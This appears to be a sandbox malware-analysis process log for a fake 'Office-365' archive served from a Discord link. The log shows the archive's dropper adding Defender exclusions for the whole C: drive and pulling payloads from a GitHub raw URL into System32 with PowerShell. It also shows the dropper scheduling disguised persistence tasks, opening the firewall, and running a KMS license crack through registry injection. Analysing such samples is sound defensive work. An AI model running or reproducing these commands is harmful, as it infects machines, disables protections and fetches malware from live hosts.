C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1097612223544836197/1316830236247326831/Office-365.rar?ex=675c7939&is=675b27b9&hm=88f64580fbc57e5e15fb335ded817035c026a64f2f2dfa824c029b6334369515&1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffedd6ccc40,0x7ffedd6ccc4c,0x7ffedd6ccc582⤵PID:2232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2028,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2032 /prefetch:22⤵PID:1332
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1816,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:32⤵PID:4736
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2244,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2264 /prefetch:82⤵PID:2452
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3100,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:12⤵PID:2588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:12⤵PID:2832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4748,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4844 /prefetch:82⤵PID:1692
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4508,i,8892651497772931192,13112916493629382916,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4728 /prefetch:82⤵PID:3444
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"1⤵PID:4252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:1628
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4036
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Office-365\" -spe -an -ai#7zMap23142:82:7zEvent194391⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2864
-
C:\Users\Admin\Downloads\Office-365\myprograme.exe"C:\Users\Admin\Downloads\Office-365\myprograme.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Modifies registry class
PID:2992 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\run_setup.bat"2⤵
- System Location Discovery: System Language Discovery
PID:4224 -
C:\Windows\SysWOW64\cmd.execmd /c "Csetup.exe"3⤵
- System Location Discovery: System Language Discovery
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\Csetup.exeCsetup.exe4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4152 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:1100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionProcess 'C:\\*'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Windows\system32\timeout.exetimeout /t 2 /nobreak6⤵
- Delays execution with timeout.exe
PID:4364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\\*'"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2736
-
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:4848
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/ZUMBAA' -OutFile 'C:\Windows\System32\vcruntime143_thread.dll'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat5⤵PID:544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5076
-
-
C:\Windows\system32\rundll32.exerundll32.exe vcruntime143_thread.dll,Start6⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
PID:3468 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"7⤵
- Scheduled Task/Job: Scheduled Task
PID:4040
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat7⤵PID:4704
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/VAN' -OutFile 'C:\Windows\Help\service\wininitt.exe'"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
-
-
C:\Windows\Help\service\wininitt.exeC:\Windows\Help\service\wininitt.exe7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1100 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Help\service\wininitt.exe" "wininitt.exe" ENABLE8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3652
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\active.bat""2⤵
- System Location Discovery: System Language Discovery
PID:1040 -
C:\Windows\system32\cmd.execmd /v:on /c echo(^!param^!3⤵PID:5108
-
-
C:\Windows\system32\findstr.exefindstr /R "[| ` ~ ! @ % \^ & ( ) \[ \] { } + = ; ' , |]*^"3⤵PID:3108
-
-
C:\Windows\system32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\WinMgmt /v Start3⤵
- Modifies registry key
PID:468
-
-
C:\Windows\system32\find.exefind /i "0x4"3⤵PID:4036
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4996
-
-
C:\Windows\system32\find.exefind /i "ComputerSystem"3⤵PID:2864
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c $ExecutionContext.SessionState.LanguageMode3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1648
-
-
C:\Windows\system32\find.exefind /i "Full"3⤵PID:1640
-
-
C:\Windows\system32\reg.exereg query HKU\S-1-5-193⤵PID:5076
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop3⤵
- System Location Discovery: System Language Discovery
PID:1724 -
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop4⤵PID:4836
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver3⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3960 -
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR4⤵PID:3644
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:1704
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:544
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:4524
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:4364
-
-
C:\Windows\system32\reg.exereg query "HKCU\Console" /v ForceV23⤵PID:1952
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:1816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\skus3⤵
- System Location Discovery: System Language Discovery
PID:2708
-
-
C:\Windows\system32\sc.exesc query osppsvc3⤵
- Launches sc.exe
PID:3108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\addons 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4276
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"3⤵PID:3468
-
-
C:\Windows\system32\mode.commode con cols=80 lines=343⤵PID:544
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:5076
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1952
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:4036
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:1468
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1044
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:5108
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:2912
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:1872
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1640
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:4468
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:3468
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2628
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:400
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:4036
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:3880
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:2192
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:2708
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:5108
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:4008
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:5060
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:3960
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:2724
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1640
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:3360
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:1468
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:1952
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:3880
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:4404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %B in (1) do rem"3⤵
- System Location Discovery: System Language Discovery
PID:1516
-
-
C:\Windows\system32\mode.commode con cols=100 lines=343⤵PID:2708
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3468
-
-
C:\Windows\system32\Wbem\WMIC.exeWMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\Sysnative\SppExtComObjHook.dll" Force=True3⤵PID:1044
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:2028
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:400
-
-
C:\Windows\system32\net.exenet stop sppsvc /y3⤵PID:3960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sppsvc /y4⤵PID:4036
-
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:664
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:2044
-
-
C:\Windows\system32\sc.exesc stop sppsvc3⤵
- Launches sc.exe
PID:3108
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$d='C:\Windows\System32';$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[1]);X 2"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4704 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\Temp\kcfrzlkw\kcfrzlkw.cmdline"4⤵PID:4408
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\Temp\RES49.tmp" "c:\Windows\Temp\kcfrzlkw\CSC244F468DF46343F2B574EDD66152B10.TMP"5⤵PID:3920
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\active.bat""2⤵
- System Location Discovery: System Language Discovery
PID:3572 -
C:\Windows\system32\cmd.execmd /v:on /c echo(^!param^!3⤵PID:3868
-
-
C:\Windows\system32\findstr.exefindstr /R "[| ` ~ ! @ % \^ & ( ) \[ \] { } + = ; ' , |]*^"3⤵PID:4040
-
-
C:\Windows\system32\reg.exereg query HKLM\SYSTEM\CurrentControlSet\Services\WinMgmt /v Start3⤵
- Modifies registry key
PID:780
-
-
C:\Windows\system32\find.exefind /i "0x4"3⤵PID:3280
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path Win32_ComputerSystem get CreationClassName /value3⤵PID:4036
-
-
C:\Windows\system32\find.exefind /i "ComputerSystem"3⤵PID:2724
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c $ExecutionContext.SessionState.LanguageMode3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4624
-
-
C:\Windows\system32\find.exefind /i "Full"3⤵PID:2736
-
-
C:\Windows\system32\reg.exereg query HKU\S-1-5-193⤵PID:4740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop3⤵
- System Location Discovery: System Language Discovery
PID:3280 -
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop4⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver3⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4564 -
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v UBR4⤵PID:5060
-
-
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:3960
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:1340
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings" /v Enabled3⤵PID:5000
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:3896
-
-
C:\Windows\system32\reg.exereg query "HKCU\Console" /v ForceV23⤵PID:2960
-
-
C:\Windows\system32\find.exefind /i "0x0"3⤵PID:1200
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\skus3⤵
- System Location Discovery: System Language Discovery
PID:1560
-
-
C:\Windows\system32\sc.exesc query osppsvc3⤵
- Launches sc.exe
PID:468
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir /b /ad C:\Windows\Sysnative\spp\tokens\addons 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2344
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sppsvc.exe"3⤵PID:4912
-
-
C:\Windows\system32\mode.commode con cols=80 lines=343⤵PID:2732
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:4704
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:816
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:2140
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:4688
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2028
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:3004
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*retail"3⤵PID:1816
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:4624
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:780
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:844
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:2956
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:2276
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:4612
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:544
-
-
C:\Windows\system32\findstr.exefindstr /i /r ".*volume"3⤵PID:1516
-
-
C:\Windows\system32\findstr.exefindstr /i /v "project visio"3⤵PID:3228
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:5060
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:3960
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:1340
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2272
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:2320
-
-
C:\Windows\system32\findstr.exefindstr /i /r "project.*"3⤵PID:1552
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:2236
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:3472
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:468
-
-
C:\Windows\system32\find.exefind /i "0x2"3⤵PID:2240
-
-
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\LicensingNext3⤵
- Modifies registry key
PID:4360
-
-
C:\Windows\system32\findstr.exefindstr /i /r "visio.*"3⤵PID:2080
-
-
C:\Windows\system32\find.exefind /i "0x3"3⤵PID:3988
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /v VerifierFlags3⤵PID:1300
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /v VerifierFlags3⤵PID:2944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "prompt #$H#$E# & echo on & for %B in (1) do rem"3⤵
- System Location Discovery: System Language Discovery
PID:816
-
-
C:\Windows\system32\mode.commode con cols=100 lines=343⤵PID:4528
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4624
-
-
C:\Windows\system32\Wbem\WMIC.exeWMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\Sysnative\SppExtComObjHook.dll" Force=True3⤵PID:1516
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:4608
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:1704
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:4996
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:2960
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$d='C:\Windows\System32';$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[1]);X 2"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2708 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\Temp\raxki5h5\raxki5h5.cmdline"4⤵PID:400
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\Temp\RESA2C.tmp" "c:\Windows\Temp\raxki5h5\CSC12A8482D1E54CE5BB92BF8DCDA9A990.TMP"5⤵PID:3280
-
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v Debugger3⤵PID:780
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierDlls /t REG_SZ /d "SppExtComObjHook.dll"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2956
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierDebug /t REG_DWORD /d 0x000000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3444
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierFlags /t REG_DWORD /d 0x800000003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4624
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v GlobalFlag /t REG_DWORD /d 0x000001003⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5060
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_Emulation /t REG_DWORD /d 13⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2724
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 1203⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3960
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 100803⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1676
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_HWID /t REG_QWORD /d "0x3A1C049600B60076"3⤵
